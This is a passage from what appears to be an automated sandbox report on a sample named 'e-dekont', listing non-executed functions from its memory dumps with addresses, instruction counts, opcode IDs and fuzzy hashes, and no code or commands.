                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Function 02DCEA08 Relevance: 1.8, Strings: 1, Instructions: 596COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .5vq
                                                        • API String ID: 0-493797296
                                                        • Opcode ID: 261e3a24271669476a0e17a6ca144dd7aaa8807c2ac4601ab98d46802702826b
                                                        • Instruction ID: 373ba1473989ed410fae1ee4ae441e049579e3613f6bc45390af2b2dbdf0b4cb
                                                        • Opcode Fuzzy Hash: 261e3a24271669476a0e17a6ca144dd7aaa8807c2ac4601ab98d46802702826b
                                                        • Instruction Fuzzy Hash: 2E52A074E01229CFDB64DF65C984B9DBBB2BB49300F1085EAD409A7354DB359E81CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C03808 Relevance: 1.5, Strings: 1, Instructions: 222COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oAp
                                                        • API String ID: 0-730047704
                                                        • Opcode ID: c9a42eb015775274218f8c6f1394638cbdd9f138a081fa161958c63f0c75b4d0
                                                        • Instruction ID: 81e29a0edfd75b3168f955d3086f1fc85cf0de17f124498b917af1657fa15ffe
                                                        • Opcode Fuzzy Hash: c9a42eb015775274218f8c6f1394638cbdd9f138a081fa161958c63f0c75b4d0
                                                        • Instruction Fuzzy Hash: E9B19574E00218CFDB54DFA9D984A9DBBB2FF89310F1081A9D819AB365DB35AD81CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C037FA Relevance: 1.4, Strings: 1, Instructions: 131COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oAp
                                                        • API String ID: 0-730047704
                                                        • Opcode ID: 1da800a595f1c030bf794d5c60d4b8a808bfba17f15113ae4a2dafecfce4b90c
                                                        • Instruction ID: ceaf7e7f6850b860e6010137e0f882c00670f8179aa87053a32cfd5d8cf0c8ab
                                                        • Opcode Fuzzy Hash: 1da800a595f1c030bf794d5c60d4b8a808bfba17f15113ae4a2dafecfce4b90c
                                                        • Instruction Fuzzy Hash: 51519374E016488FDB58CFAAD884A9DBBF2FF89310F248169D419AB365DB349942CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05B40040 Relevance: .7, Instructions: 709COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091126891.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_5b40000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 026aa583fed94d160677d4b2944989f57ef3821540a10fd65d45ec36f6e8ebfc
                                                        • Instruction ID: 118220b999be50ed456001f96f55f4e8cf031514699fed72532d05deff2e3a05
                                                        • Opcode Fuzzy Hash: 026aa583fed94d160677d4b2944989f57ef3821540a10fd65d45ec36f6e8ebfc
                                                        • Instruction Fuzzy Hash: FA72CD74E052298FDB64DF69C984BEDBBB2BB49300F1091E9D509AB351DB34AE81DF40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02DCF941 Relevance: .3, Instructions: 279COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9ad80499ba99a9d00f9ff36811b0cfadd50208826cd8c07e999d4ed71e13f334
                                                        • Instruction ID: 9136b3d1ad9736af0f221052930a8c7d14cd616a08859bd5e6054d6060135111
                                                        • Opcode Fuzzy Hash: 9ad80499ba99a9d00f9ff36811b0cfadd50208826cd8c07e999d4ed71e13f334
                                                        • Instruction Fuzzy Hash: 6ED18174E01218CFDB14DFA5C994B9DBBB2BF88304F2084AAD409AB365DB359E85CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02DCF4E8 Relevance: .3, Instructions: 277COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 451e00e71531e7f7a6bef2935f853403f380b03c1106b769212fe6f693b48240
                                                        • Instruction ID: f8b718982a37d4236d3c8467bd17d030ea8a3f8019d2103bc71c264384ae3a96
                                                        • Opcode Fuzzy Hash: 451e00e71531e7f7a6bef2935f853403f380b03c1106b769212fe6f693b48240
                                                        • Instruction Fuzzy Hash: F4C18F74E01219CFDB14DFA5C994B9DBBB2BF89304F2080AAD409AB365DB35AD85CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05B4C9B8 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091126891.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_5b40000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 54f895122cdf88d670e9dfc31f0de20f5b0b959976ec589981263e96ef5dfea2
                                                        • Instruction ID: dea0cfc8304e547fc44be6dc19cf77e0d1f213300425c2e772fc6332ca16708d
                                                        • Opcode Fuzzy Hash: 54f895122cdf88d670e9dfc31f0de20f5b0b959976ec589981263e96ef5dfea2
                                                        • Instruction Fuzzy Hash: 7FC19074E01218CFDB14DFA5C954BADBBB2BB89300F2081A9D409AB365DB35AD85DF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05B41980 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091126891.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_5b40000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fd6ab4d32d94047a0e32d0fb5d3c06148f0194bdc47323e005f65bf8cda73075
                                                        • Instruction ID: c207e4fc8e9c2b0a248c9fe8ba58cd2d8081f81a8fefa2ef7ed3b51c21e5a329
                                                        • Opcode Fuzzy Hash: fd6ab4d32d94047a0e32d0fb5d3c06148f0194bdc47323e005f65bf8cda73075
                                                        • Instruction Fuzzy Hash: 42C17F74E00218CFDB14DFA9D954BADBBB2FB89300F2085A9D409AB354DB35AD85DF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05B4F980 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091126891.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_5b40000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2db0cf4906efbd934d3363b776f0ae5672af436835f9776fd9bbd92dc7441384
                                                        • Instruction ID: 31fea7a69b90412fcc9061dfa845041f04a47eda14de76c8d71df6171053d04a
                                                        • Opcode Fuzzy Hash: 2db0cf4906efbd934d3363b776f0ae5672af436835f9776fd9bbd92dc7441384
                                                        • Instruction Fuzzy Hash: C9C18074E00218CFDB14DFA5D954BADBBB2FB89300F2081A9D409AB364DB35AD85DF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05B41DE0 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091126891.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_5b40000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c033f06b41c822d38aed44c9b2346e6ac025e1c3a1c7369528fbca3cb4370629
                                                        • Instruction ID: ffd54f03614688a3f743f5dfeeea599e29d6992d1f68d1530258fdc7e6c893b8
                                                        • Opcode Fuzzy Hash: c033f06b41c822d38aed44c9b2346e6ac025e1c3a1c7369528fbca3cb4370629
                                                        • Instruction Fuzzy Hash: 57C18074E00218CFDB14DFA5D994BADBBB2FB89300F2085A9D809AB354DB35AD85DF10
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05B4E3C8 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091126891.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_5b40000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a772b0540d7aa7bacd525040b347c3493db64f08902ac770463b657163935caa
                                                        • Instruction ID: 12b2b58795cc6c0e0f39e5a71549a0c8a5f2cd83bbc80f8d39d8b7e7c489ca6a
                                                        • Opcode Fuzzy Hash: a772b0540d7aa7bacd525040b347c3493db64f08902ac770463b657163935caa
                                                        • Instruction Fuzzy Hash: F3C18074E00218CFDB14DFA5C994BADBBB2BB89300F2081A9D409AB365DB35AD85DF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05B41520 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091126891.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_5b40000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d06d5ae149858f79454657f9e806256b0acdec28c8685a88b1504bd396772edb
                                                        • Instruction ID: 3fa9dde19d40d357b4de091e06d082851132162e6c66d066e2bb5d3f16c9962d
                                                        • Opcode Fuzzy Hash: d06d5ae149858f79454657f9e806256b0acdec28c8685a88b1504bd396772edb
                                                        • Instruction Fuzzy Hash: 3FC18074E01218CFDB14DFA9D954BADBBB2FB89300F2085A9D409AB355DB35AE85CF10
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05B4F528 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091126891.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_5b40000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3ee58b6020723896ec30fcab1f66e6b07cb1236297e01acc73cd3c619cbb9474
                                                        • Instruction ID: 9fa797ba27ff752c9ef08e8bbd33a1398adb52f54db36a6b9c82cd9b9cca1186
                                                        • Opcode Fuzzy Hash: 3ee58b6020723896ec30fcab1f66e6b07cb1236297e01acc73cd3c619cbb9474
                                                        • Instruction Fuzzy Hash: 7EC18074E00218CFDB14DFA5D954BADBBB2BF89300F2081A9D409AB365DB35AE85DF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05B4DB18 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091126891.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_5b40000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0c83d05e57dbc220cb901e40f26179acb7beccd1822a686c7db04e4558f0f14e
                                                        • Instruction ID: 241cd8dbdb0e2c481624b97b41ec680f965484df0142034c37a98fec433c1a1c
                                                        • Opcode Fuzzy Hash: 0c83d05e57dbc220cb901e40f26179acb7beccd1822a686c7db04e4558f0f14e
                                                        • Instruction Fuzzy Hash: 31C18074E00218CFDB14DFA5C994BADBBB2FB89300F2081A9D409AB365DB35AD85DF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05B4C108 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091126891.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_5b40000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a4030a296bc13358744689e11b5c5044262ac33011fe2fa76585ac70d1012143
                                                        • Instruction ID: 5652209f872190c9b69f7d5a78eca09e4ce8e1e1bb5b1f8f48775e90337eab1b
                                                        • Opcode Fuzzy Hash: a4030a296bc13358744689e11b5c5044262ac33011fe2fa76585ac70d1012143
                                                        • Instruction Fuzzy Hash: 45C18F74E01218CFDB14DFA5C954BADBBB2FB89300F2081A9D409AB364DB35AE85DF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05B4DF70 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091126891.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_5b40000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1175ca1f130557293bb79bf3a0555f988647636b5d5381767730957618ad2186
                                                        • Instruction ID: d17dd326d2efc4d57da5037ab9cae752cba3db5d21c33a0032f9289e88bd8d1d
                                                        • Opcode Fuzzy Hash: 1175ca1f130557293bb79bf3a0555f988647636b5d5381767730957618ad2186
                                                        • Instruction Fuzzy Hash: C8C18074E00218CFDB14DFA5C954BADBBB2FB89300F2081A9D409AB365DB35AD85DF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05B4C560 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091126891.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_5b40000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fe728a92012ca3102a222308c10cb04a94d56d6cb2d8af3e9b379fb1749851da
                                                        • Instruction ID: f89007b06ee0d37876b5f281f84b71d8c97f6f41ecd3af5ea28123716dd1a476
                                                        • Opcode Fuzzy Hash: fe728a92012ca3102a222308c10cb04a94d56d6cb2d8af3e9b379fb1749851da
                                                        • Instruction Fuzzy Hash: A5C17F74E01218CFDB14DFA5C954BADBBB2FB89300F2081A9D409AB365DB35AD85DF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05B4F0D0 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091126891.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_5b40000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7f14ed8385a2f1350c36455565b56ae0a8590f8675d12d3c5e86fdf471e82904
                                                        • Instruction ID: 8f4debe1041024e3c3aac0c5011f350fc9e5694e267fa29f46f0ab8999700e4e
                                                        • Opcode Fuzzy Hash: 7f14ed8385a2f1350c36455565b56ae0a8590f8675d12d3c5e86fdf471e82904
                                                        • Instruction Fuzzy Hash: B6C18074E01218CFDB14DFA5D954BADBBB2BF89300F2081A9D409AB364DB35AE85DF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05B4D6C0 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091126891.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_5b40000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 10ee045cb944e218bb5f160848d3d8f61f00fda9c068ccb68e0d1c12076252e9
                                                        • Instruction ID: 6584ac4fdcd22cb1f7d0e6a427d2be87143001223d58200c3b8ec77fe4b5a227
                                                        • Opcode Fuzzy Hash: 10ee045cb944e218bb5f160848d3d8f61f00fda9c068ccb68e0d1c12076252e9
                                                        • Instruction Fuzzy Hash: 8AC18074E01218CFDB14DFA5D954BADBBB2BF89300F2081A9D409AB364DB35AE85DF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05B410C0 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091126891.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_5b40000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c63e98aa0a4ab664d71e9a0851abdd004dcbfdf9ffa278562014aa2926767872
                                                        • Instruction ID: ac6dd849ade598991c959b3cb41e67b1a04bcc000b3bd66f06e3ce22e1511492
                                                        • Opcode Fuzzy Hash: c63e98aa0a4ab664d71e9a0851abdd004dcbfdf9ffa278562014aa2926767872
                                                        • Instruction Fuzzy Hash: F4C18174E01218CFDB14DFA5D954BADBBB2FB89300F2085A9D409AB354DB35AD85CF10
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05B4E820 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091126891.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_5b40000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: efdbe9c5792906ed4f412c9d5510e485816dd13c3f5b7a47131ce4645aa95361
                                                        • Instruction ID: c25d037547595448b4cfe922ff63b8d09896e5d4c7b14c7c1ac977cadaa0bf7c
                                                        • Opcode Fuzzy Hash: efdbe9c5792906ed4f412c9d5510e485816dd13c3f5b7a47131ce4645aa95361
                                                        • Instruction Fuzzy Hash: 60C18074E00218CFDB14DFA5C954BADBBB2BB89300F2084A9D409AB365DB35AE85DF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05B4CE10 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091126891.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_5b40000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d21c5832928ad6d07a09972f07edcf169288ddaea6bce1b37c500bc38df8b0f0
                                                        • Instruction ID: 898f89b6d12a9a1ec256842790b357e16358c2a89f9e9df3f152868eff101114
                                                        • Opcode Fuzzy Hash: d21c5832928ad6d07a09972f07edcf169288ddaea6bce1b37c500bc38df8b0f0
                                                        • Instruction Fuzzy Hash: 27C19074E01218CFDB14DFA5C954BADBBB2BF89300F2081A9D409AB364DB35AD85DF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05B4EC78 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091126891.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_5b40000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4951d243acf7afbf155fe89a2af38f4ba04c5e2e8a08cf206f2d54d9a01a8b1a
                                                        • Instruction ID: 8ddb854016793450a1a285a3346f27943707aac2afcb93aeb44745fc3b6ee7b1
                                                        • Opcode Fuzzy Hash: 4951d243acf7afbf155fe89a2af38f4ba04c5e2e8a08cf206f2d54d9a01a8b1a
                                                        • Instruction Fuzzy Hash: 85C19074E00218CFDB14DFA5C994BADBBB2FB89300F2081A9D409AB364DB35AD85DF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05B40C60 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091126891.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_5b40000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5f0e6c211c4c69d115312fc86ab0c892aad4bc6c69e78661828a2913d368197f
                                                        • Instruction ID: ae37d623b021ba7145a9abce20f88a1bbe6c18efdbd5fc75b761d8867d15bb66
                                                        • Opcode Fuzzy Hash: 5f0e6c211c4c69d115312fc86ab0c892aad4bc6c69e78661828a2913d368197f
                                                        • Instruction Fuzzy Hash: B6C18074E00218CFDB14DFA5D954BADBBB2FB89300F2085A9D809AB354DB35AD85DF10
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05B4D268 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091126891.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_5b40000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 17af24066ff3c64d612186c4baaeb7b39f5f2f96cdf3080ab0b65fb3a98cedb1
                                                        • Instruction ID: 15fede888655603b1329489e6a07dfd2728283d1e68d74d15b264c3f1918d612
                                                        • Opcode Fuzzy Hash: 17af24066ff3c64d612186c4baaeb7b39f5f2f96cdf3080ab0b65fb3a98cedb1
                                                        • Instruction Fuzzy Hash: DCC19074E00218CFDB14DFA5C954BADBBB2FB89300F2081A9D409AB365DB35AD85DF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C05EC0 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7efc56dbd732a5873d4c33a9daa74af16c7476a2b10210e5df48b8f9e7c8bd02
                                                        • Instruction ID: d369a514940b4a8f58062e6fbf09c1fe128d3b6406ad907b3ccffa12e37b35bc
                                                        • Opcode Fuzzy Hash: 7efc56dbd732a5873d4c33a9daa74af16c7476a2b10210e5df48b8f9e7c8bd02
                                                        • Instruction Fuzzy Hash: 7FC19F74E01218CFDB54DFA5C994B9DBBB2BF89300F2084A9D409AB365DB35AE85CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C05A68 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 49442990832c988cb2dd5643701661e5f57a152aa17061b58c5451ed46d3778c
                                                        • Instruction ID: 588a57b7c8896bec0a7be1054ae37b41b868c0ea4f4df5c08def3c86295af2f5
                                                        • Opcode Fuzzy Hash: 49442990832c988cb2dd5643701661e5f57a152aa17061b58c5451ed46d3778c
                                                        • Instruction Fuzzy Hash: 3DC18174E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D409AB365DB35AE85CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C08600 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 003124412591ce20e6e4f4e9a69e84ada98d5138f4ec7da637c7b59a94525235
                                                        • Instruction ID: 4a796d97b91365db0927ef6e725625d0e3b2e9d988f99f2f402a2166b79867bb
                                                        • Opcode Fuzzy Hash: 003124412591ce20e6e4f4e9a69e84ada98d5138f4ec7da637c7b59a94525235
                                                        • Instruction Fuzzy Hash: 1BC18F74E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D409AB365DB35AE85CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C06BC8 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9efdab742e2b280f83da8e5b25b2d75bbc8fdec1647bdcec5438fcea2af930a4
                                                        • Instruction ID: c7ea297baa71585bcd31b057f4ae02e33ab266bc6988f3a308f33be0855b27cb
                                                        • Opcode Fuzzy Hash: 9efdab742e2b280f83da8e5b25b2d75bbc8fdec1647bdcec5438fcea2af930a4
                                                        • Instruction Fuzzy Hash: C5C18074E00218CFDB54DFA5C994B9DBBB2BF89300F2081A9D409AB364DB35AE85CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C06770 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 31972a02b16d3a71b913b96d5f5b03a2ea805b977d89c0491676f139598a5a77
                                                        • Instruction ID: 7b656f78c459f289a589cbbcacbadb5a1b62cd317e9652b4dcfa31c29c0580cd
                                                        • Opcode Fuzzy Hash: 31972a02b16d3a71b913b96d5f5b03a2ea805b977d89c0491676f139598a5a77
